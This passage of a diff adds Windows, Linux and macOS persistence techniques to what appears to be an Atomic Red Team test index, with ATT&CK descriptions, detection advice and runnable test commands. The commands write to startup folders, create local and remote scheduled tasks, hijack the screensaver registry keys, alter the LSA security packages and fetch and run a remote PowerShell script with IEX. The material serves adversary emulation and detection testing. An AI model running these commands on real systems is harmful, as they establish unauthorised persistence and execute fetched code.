twice. 
\nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start + Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted + and the user logs in.\n" + supported_platforms: + - windows + executor: + command: | + Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" + Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" + cscript.exe /E:Jscript "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" + cscript.exe /E:Jscript "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" + cleanup_command: | + Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" -ErrorAction Ignore + Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" -ErrorAction Ignore + name: powershell + elevation_required: true + - name: Suspicious bat file run from startup Folder + auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e + description: | + bat files can be placed in and executed from the startup folder to maintain persistance. + Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" + folder and will also run when the computer is restarted and the user logs in. 
+ supported_platforms: + - windows + executor: + command: | + Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" + Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" + Start-Process "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" + Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" + cleanup_command: | + Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" -ErrorAction Ignore + Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" -ErrorAction Ignore + name: powershell + elevation_required: true + - name: Add Executable Shortcut Link to User Startup Folder + auto_generated_guid: 24e55612-85f6-4bd6-ae74-a73d02e3441d + description: 'Adds a non-malicious executable shortcut link to the current users + startup directory. Test can be verified by going to the users startup directory + and checking if the shortcut link exists. 
' + supported_platforms: + - windows + executor: + command: "$Target = \"C:\\Windows\\System32\\calc.exe\"\n$ShortcutLocation + = \"$home\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\calc_exe.lnk\"\n$WScriptShell + = New-Object -ComObject WScript.Shell\n$Create = $WScriptShell.CreateShortcut($ShortcutLocation)\n$Create.TargetPath + = $Target\n$Create.Save() " + cleanup_command: Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start + Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore + name: powershell + elevation_required: true + T1505.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1505.001 + url: https://attack.mitre.org/techniques/T1505/001 + - source_name: NetSPI Startup Stored Procedures + url: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/ + description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via + SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.' + - source_name: Kaspersky MSSQL Aug 2019 + url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/ + description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote + attack on Microsoft SQL Server. Retrieved September 4, 2019.' + - source_name: Microsoft xp_cmdshell 2017 + url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017 + description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved + September 9, 2019. + - source_name: Microsoft CLR Integration 2017 + url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017 + description: Microsoft. (2017, June 19). Common Language Runtime Integration. + Retrieved July 8, 2019. + - source_name: NetSPI SQL Server CLR + url: https://blog.netspi.com/attacking-sql-server-clr-assemblies/ + description: Sutherland, S. 
(2017, July 13). Attacking SQL Server CLR Assemblies. + Retrieved July 8, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: SQL Stored Procedures + description: "Adversaries may abuse SQL stored procedures to establish persistent + access to systems. SQL Stored Procedures are code that can be saved and reused + so that database users do not waste time rewriting frequently used SQL queries. + Stored procedures can be invoked via SQL statements to the database using + the procedure name or via defined events (e.g. when a SQL server application + is started/restarted).\n\nAdversaries may craft malicious stored procedures + that can provide a persistence mechanism in SQL database servers.(Citation: + NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019) To execute + operating system commands through SQL syntax the adversary may have to enable + additional functionality, such as xp_cmdshell for MSSQL Server.(Citation: + NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019)(Citation: + Microsoft xp_cmdshell 2017) \n\nMicrosoft SQL Server can enable common language + runtime (CLR) integration. With CLR integration enabled, application developers + can write stored procedures using any .NET framework language (e.g. 
VB .NET, + C#, etc.).(Citation: Microsoft CLR Integration 2017) Adversaries may craft + or modify CLR assemblies that are linked to stored procedures since these + CLR assemblies can be made to execute arbitrary commands.(Citation: NetSPI + SQL Server CLR) " + id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-25T23:30:20.638Z' + created: '2019-12-12T14:59:58.168Z' + x_mitre_data_sources: + - 'Application Log: Application Log Content' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - SYSTEM + - root + x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation: + NetSPI Startup Stored Procedures) Consider enabling audit features that can + log malicious startup activities.' + x_mitre_contributors: + - Carlos Borges, @huntingneo, CIP + - Lucas da Silva Pereira, @vulcanunsec, CIP + - Kaspersky + x_mitre_platforms: + - Windows + - Linux + atomic_tests: [] + T1098.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1098.004 + url: https://attack.mitre.org/techniques/T1098/004 + - source_name: SSH Authorized Keys + url: https://www.ssh.com/ssh/authorized_keys/ + description: ssh.com. (n.d.). Authorized_keys File in SSH. Retrieved June + 24, 2020. + - source_name: Venafi SSH Key Abuse + url: https://www.venafi.com/blog/growing-abuse-ssh-keys-commodity-malware-campaigns-now-equipped-ssh-capabilities + description: 'Blachman, Y. (2020, April 22). Growing Abuse of SSH Keys: Commodity + Malware Campaigns Now Equipped with SSH Capabilities. Retrieved June 24, + 2020.' + - source_name: Cybereason Linux Exim Worm + url: https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability + description: Cybereason Nocturnus. (2019, June 13). 
New Pervasive Worm Exploiting + Linux Exim Server Vulnerability. Retrieved June 24, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: SSH Authorized Keys + description: |- + Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config. + + Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse) (Citation: Cybereason Linux Exim Worm) + id: attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-06-25T16:32:23.367Z' + created: '2020-06-24T12:42:35.144Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_detection: |- + Use file integrity monitoring to detect changes made to the authorized_keys file for each user on a system. Monitor for suspicious processes modifying the authorized_keys file. 
+ + Monitor for changes to and suspicious processes modifiying /etc/ssh/sshd_config. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Modification' + x_mitre_contributors: + - Tony Lambert, Red Canary + x_mitre_platforms: + - Linux + - macOS + identifier: T1098.004 + atomic_tests: + - name: Modify SSH Authorized Keys + auto_generated_guid: 342cc723-127c-4d3a-8292-9c0c6b4ecadc + description: "Modify contents of /.ssh/authorized_keys to maintain + persistence on victim host. \nIf the user is able to save the same contents + in the authorized_keys file, it shows user can modify the file.\n" + supported_platforms: + - macos + - linux + executor: + name: bash + elevation_required: false + command: 'if [ -f ~/.ssh/authorized_keys ]; then ssh_authorized_keys=$(cat + ~/.ssh/authorized_keys); echo $ssh_authorized_keys > ~/.ssh/authorized_keys; + fi; + +' + cleanup_command: 'unset ssh_authorized_keys + +' + T1053.005: + technique: + created: '2019-11-27T14:58:00.429Z' + modified: '2020-12-30T14:26:44.730Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1053.005 + url: https://attack.mitre.org/techniques/T1053/005 + - url: https://twitter.com/leoloobeek/status/939248813465853953 + description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved + December 12, 2017. + source_name: Twitter Leoloobeek Scheduled Task + - url: https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen + description: Satyajit321. (2015, November 3). Scheduled Tasks History Retention + settings. Retrieved December 12, 2017. 
+ source_name: TechNet Forum Scheduled Task Operational Setting + - url: https://technet.microsoft.com/library/dd315590.aspx + description: Microsoft. (n.d.). General Task Registration. Retrieved December + 12, 2017. + source_name: TechNet Scheduled Task Events + - source_name: Microsoft Scheduled Task Events Win10 + url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events + description: Microsoft. (2017, May 28). Audit Other Object Access Events. + Retrieved June 27, 2019. + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Scheduled Task + description: |- + Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task. + + The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At (Windows)](https://attack.mitre.org/techniques/T1053/002)), though at.exe can not access tasks created with schtasks or the Control Panel. + + An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. 
The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM). + id: attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9 + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_remote_support: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: |- + Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. + + Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10) + + * Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered + * Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated + * Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted + * Event ID 4698 on Windows 10, Server 2016 - Scheduled task created + * Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled + * Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled + + Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. 
(Citation: TechNet Autoruns) + + Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data. + x_mitre_data_sources: + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_platforms: + - Windows + identifier: T1053.005 + atomic_tests: + - name: Scheduled Task Startup Script + auto_generated_guid: fec27f65-db86-4c2d-b66c-61945aee87c2 + description: | + Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view + the tasks, open the Task Scheduler and look in the Active Tasks pane. + supported_platforms: + - windows + executor: + command: | + schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe" + schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe" + cleanup_command: | + schtasks /delete /tn "T1053_005_OnLogon" /f >nul 2>&1 + schtasks /delete /tn "T1053_005_OnStartup" /f >nul 2>&1 + name: command_prompt + elevation_required: true + - name: Scheduled task Local + auto_generated_guid: 42f53695-ad4a-4546-abb6-7d837f644a71 + description: 'Upon successful execution, cmd.exe will create a scheduled task + to spawn cmd.exe at 20:10. 
+ +' + supported_platforms: + - windows + input_arguments: + task_command: + description: What you want to execute + type: String + default: C:\windows\system32\cmd.exe + time: + description: What time 24 Hour + type: String + default: 72600 + executor: + name: command_prompt + elevation_required: false + command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} + +' + cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 + +' + - name: Scheduled task Remote + auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd + description: | + Create a task on a remote system. + + Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint. + supported_platforms: + - windows + input_arguments: + task_command: + description: What you want to execute + type: String + default: C:\windows\system32\cmd.exe + time: + description: What time 24 Hour + type: String + default: 72600 + target: + description: Target + type: String + default: localhost + user_name: + description: 'Username to authenticate with, format: DOMAIN\User' + type: String + default: DOMAIN\user + password: + description: Password to authenticate with + type: String + default: At0micStrong + executor: + name: command_prompt + elevation_required: true + command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN + "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} + +' + cleanup_command: 'SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password} + /TN "Atomic task" /F >nul 2>&1 + +' + - name: Powershell Cmdlet Scheduled Task + auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd + description: | + Create an atomic scheduled task that leverages native powershell cmdlets. + + Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10. 
+ supported_platforms: + - windows + executor: + name: powershell + elevation_required: false + command: | + $Action = New-ScheduledTaskAction -Execute "calc.exe" + $Trigger = New-ScheduledTaskTrigger -AtLogon + $User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest + $Set = New-ScheduledTaskSettingsSet + $object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set + Register-ScheduledTask AtomicTask -InputObject $object + cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false + >$null 2>&1 + +' + - name: Task Scheduler via VBA + auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 + description: | + This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within + 30 - 40 seconds after this module has run + supported_platforms: + - windows + input_arguments: + ms_product: + description: Maldoc application Word + type: String + default: Word + dependency_executor_name: powershell + dependencies: + - description: 'Microsoft #{ms_product} must be installed + +' + prereq_command: | + try { + New-Object -COMObject "#{ms_product}.Application" | Out-Null + $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} + Stop-Process -Name $process + exit 0 + } catch { exit 1 } + get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} + manually to meet this requirement" + +' + executor: + command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" + -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n" + name: powershell + - name: WMI Invoke-CimMethod Scheduled Task + auto_generated_guid: e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b + description: 'Create an scheduled task that executes 
notepad.exe after user + login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing + as Register-ScheduledTask cmdlet behind the scenes. + +' + supported_platforms: + - windows + executor: + name: powershell + elevation_required: true + command: | + $xml = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1053.005\src\T1053_005_WMI.xml") + Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; } + cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false + >$null 2>&1 + +' + T1053: + technique: + id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Scheduled Task/Job + description: |- + Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security) + + Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). + external_references: + - source_name: mitre-attack + external_id: T1053 + url: https://attack.mitre.org/techniques/T1053 + - external_id: CAPEC-557 + source_name: capec + url: https://capec.mitre.org/data/definitions/557.html + - url: https://technet.microsoft.com/en-us/library/cc785125.aspx + description: Microsoft. 
(2005, January 21). Task Scheduler and security. Retrieved + June 8, 2016. + source_name: TechNet Task Scheduler Security + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-20T16:31:11.405Z' + created: '2017-05-31T21:30:46.977Z' + x_mitre_platforms: + - Windows + - Linux + - macOS + - Containers + x_mitre_remote_support: true + x_mitre_effective_permissions: + - SYSTEM + - Administrator + - User + x_mitre_permissions_required: + - Administrator + - SYSTEM + - User + x_mitre_detection: "Monitor scheduled task creation from common utilities using + command-line invocation. Legitimate scheduled tasks may be created during + installation of new software or through system administration functions. Look + for changes to tasks that do not correlate with known software, patch cycles, + etc. \n\nSuspicious program execution through scheduled tasks may show up + as outlier processes that have not been seen before when compared against + historical data. Data and events should not be viewed in isolation, but as + part of a chain of behavior that could lead to other activities, such as network + connections made for Command and Control, learning details about the environment + through Discovery, and Lateral Movement." 
+ x_mitre_data_sources: + - 'File: File Creation' + - 'Container: Container Creation' + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_contributors: + - Prashant Verma, Paladion + - Leo Loobeek, @leoloobeek + - Travis Smith, Tripwire + - Alain Homewood, Insomnia Security + x_mitre_version: '2.1' + x_mitre_is_subtechnique: false + atomic_tests: [] + T1546.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.002 + url: https://attack.mitre.org/techniques/T1546/002 + - source_name: Wikipedia Screensaver + description: Wikipedia. (2017, November 22). Screensaver. Retrieved December + 5, 2017. + url: https://en.wikipedia.org/wiki/Screensaver + - source_name: ESET Gazer Aug 2017 + description: 'ESET. (2017, August). Gazing at Gazer: Turla’s new second stage + backdoor. Retrieved September 14, 2017.' + url: https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Screensaver + description: |- + Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\Windows\System32\, and C:\Windows\sysWOW64\ on 64-bit Windows systems, along with screensavers included with base Windows installations. 
+ + The following screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop\) and could be manipulated to achieve persistence: + + * SCRNSAVE.exe - set to malicious PE path + * ScreenSaveActive - set to '1' to enable the screensaver + * ScreenSaverIsSecure - set to '0' to not require a password to unlock + * ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed + + Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017) + id: attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-23T12:23:04.955Z' + created: '2020-01-24T13:51:01.210Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: |- + Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior. + + Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated. 
+ x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_contributors: + - Bartosz Jerzman + x_mitre_platforms: + - Windows + identifier: T1546.002 + atomic_tests: + - name: Set Arbitrary Binary as Screensaver + auto_generated_guid: 281201e7-de41-4dc9-b73d-f288938cbb64 + description: 'This test copies a binary into the Windows System32 folder and + sets it as the screensaver so it will execute for persistence. Requires a + reboot and logon. + +' + supported_platforms: + - windows + input_arguments: + input_binary: + description: Executable binary to use in place of screensaver for persistence + type: path + default: C:\Windows\System32\cmd.exe + executor: + command: | + copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr" + reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f + reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f + reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f + reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f + shutdown /r /t 0 + name: command_prompt + elevation_required: true + T1547.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1547.005 + url: https://attack.mitre.org/techniques/T1547/005 + - url: http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html + description: Graeber, M. (2014, October). Analysis of Malicious Security Support + Provider DLLs. Retrieved March 1, 2017. + source_name: Graeber 2014 + - url: https://technet.microsoft.com/en-us/library/dn408187.aspx + description: Microsoft. (2013, July 31). Configuring Additional LSA Protection. + Retrieved June 24, 2015. 
+ source_name: Microsoft Configure LSA + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Security Support Provider + description: |- + Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. + + The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014) + id: attack-pattern--5095a853-299c-4876-abd7-ac0050fb5462 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-25T15:42:48.910Z' + created: '2020-01-24T17:16:11.806Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: 'Monitor the Registry for changes to the SSP Registry keys. + Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 + R2 may generate events when unsigned SSP DLLs try to load into the LSA by + setting the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image + File Execution Options\LSASS.exe with AuditLevel = 8. 
(Citation: Graeber + 2014) (Citation: Microsoft Configure LSA)' + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Module: Module Load' + - 'Command: Command Execution' + x_mitre_platforms: + - Windows + identifier: T1547.005 + atomic_tests: + - name: Modify SSP configuration in registry + auto_generated_guid: afdfd7e3-8a0b-409f-85f7-886fdf249c9e + description: Add a value to a Windows registry SSP key, simulating an adversarial + modification of those keys. + supported_platforms: + - windows + input_arguments: + fake_ssp_dll: + description: Value added to registry key. Normally refers to a DLL name + in C:\Windows\System32. + type: String + default: not-a-ssp + executor: + command: | + # run these in sequence + $SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages' + $SecurityPackagesUpdated = $SecurityPackages + $SecurityPackagesUpdated += "#{fake_ssp_dll}" + Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated + + # revert (before reboot) + Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages + name: powershell + elevation_required: true + T1505: + technique: + id: attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb + description: Adversaries may abuse legitimate extensible development features + of servers to establish persistent access to systems. Enterprise server applications + may include features that allow developers to write and install software or + scripts to extend the functionality of the main application. Adversaries may + install malicious components to extend and abuse server applications. 
+ name: Server Software Component + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1505 + url: https://attack.mitre.org/techniques/T1505 + - url: https://www.us-cert.gov/ncas/alerts/TA15-314A + description: US-CERT. (2015, November 13). Compromised Web Servers and Web + Shells - Threat Awareness and Guidance. Retrieved June 8, 2016. + source_name: US-CERT Alert TA15-314A Web Shells + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-09-16T19:34:19.961Z' + created: '2019-06-28T17:52:07.296Z' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Windows + - Linux + - macOS + x_mitre_permissions_required: + - Administrator + - SYSTEM + - root + x_mitre_version: '1.1' + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' + - 'Application Log: Application Log Content' + x_mitre_detection: "Consider monitoring application logs for abnormal behavior + that may indicate suspicious installation of application software components. + Consider monitoring file locations associated with the installation of new + application software components such as paths from which applications typically + load such extensible components.\n\nProcess monitoring may be used to detect + servers components that perform suspicious actions such as running cmd.exe + or accessing files. Log authentication attempts to the server and any unusual + traffic patterns to or from the server and internal network. 
